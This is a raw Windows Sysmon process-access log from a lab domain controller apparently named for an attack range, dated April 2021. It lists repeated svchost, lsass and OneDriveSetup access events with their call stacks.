14:58:06.482{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.482{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.482{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.467{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.467{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.467{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.467{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.467{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.467{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.435{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.404{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.404{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.404{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 